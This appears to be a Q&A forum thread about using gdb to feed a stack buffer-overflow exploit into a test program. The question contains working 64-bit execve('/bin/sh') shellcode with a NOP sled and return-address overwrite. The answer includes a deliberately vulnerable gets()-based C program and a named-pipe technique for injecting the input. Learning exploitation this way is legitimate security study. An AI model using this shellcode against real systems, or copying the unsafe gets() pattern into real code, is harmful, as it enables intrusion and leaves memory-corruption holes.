# How to insert complex input in gdb dynamically

Tags: c, security, gdb, buffer-overflow, shellcode

I need to insert shellcode and its address, but I can detect the address  of the buffer only after I run the program in gdb.

The input is complex. If I knew the address, I would run the program like this:

```
perl -e 'print "\x90" x 8152; 
print "\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05";
print "\x70\xa1\x4c\xa9\xff\x7f\x00\x00"' | a.out
```

When the first print is nops, the second is the shellcode (for 64-bit) and the last print is for the return address. I seperated the input to three lines only to improve its readability.

I know that usually I need to guess the address (and run this input many times), but I wonder how can I dynamically insert such an input, after I ran the program (by run).

I searched for solutions but without success. Input redirection did not work for me, as I should redirect it before the program runs, and therefore I can't see the memory and detect where the return address is saved.

I also tried named pipe but without success.

I also tried to find a way to get information about the memory where the program will run, before I actually run it in the debugger.

Any advice will be appreciated.

Answer (score 0):

I only know a somewhat laborious way with a named pipe and closing and reopening fd 0 in gdb.

Here is the program we will debug:

```
#include <stdio.h>
int func(){
    char buf[128];
    gets(buf);
    return 0;
}

int main(int argc, char *argv[]){
       func();
       return 0;
}
```

We open it with gdb and set a break point at some address where we want to gather information:

```
$ gdb ./lol
gdb$ br func
Breakpoint 1 at 0x400501
gdb$ r
Breakpoint 1, 0x0000000000400501 in func ()
gdb$ x/x $esp
...
```

Now if we have constructed our input string and are ready to feed it to the program, we open a new shell and create a named pipe and send our input into it:

```
$ mkfifo /tmp/ourpipe
$ perl -e 'print "ABCD"x100; ' > /tmp/ourpipe
```

Back in gdb we now close fd 0 (STDIN) and then open our pipe as fd 0:

```
gdb$ p close(0)
$1 = 0x0
gdb$ p open("/tmp/ourpipe",0600)
$2 = 0x0
```

If we now continue, our program will read the data coming from the pipe:

```
gdb$ c
Continuing.

Program received signal SIGSEGV, Segmentation fault.

gdb$ info frame 
Stack level 0, frame at 0x7fffffffdcc8:
rip = 0x400517 in func; saved rip 0x4443424144434241
called by frame at 0x7fffffffdcd8
Arglist at 0x4443424144434241, args: 
Locals at 0x4443424144434241, Previous frame's sp is 0x7fffffffdcd0
Saved registers:
rip at 0x7fffffffdcc8
gdb$ x/x 0x7fffffffdcc8
0x7fffffffdcc8: 0x44434241
```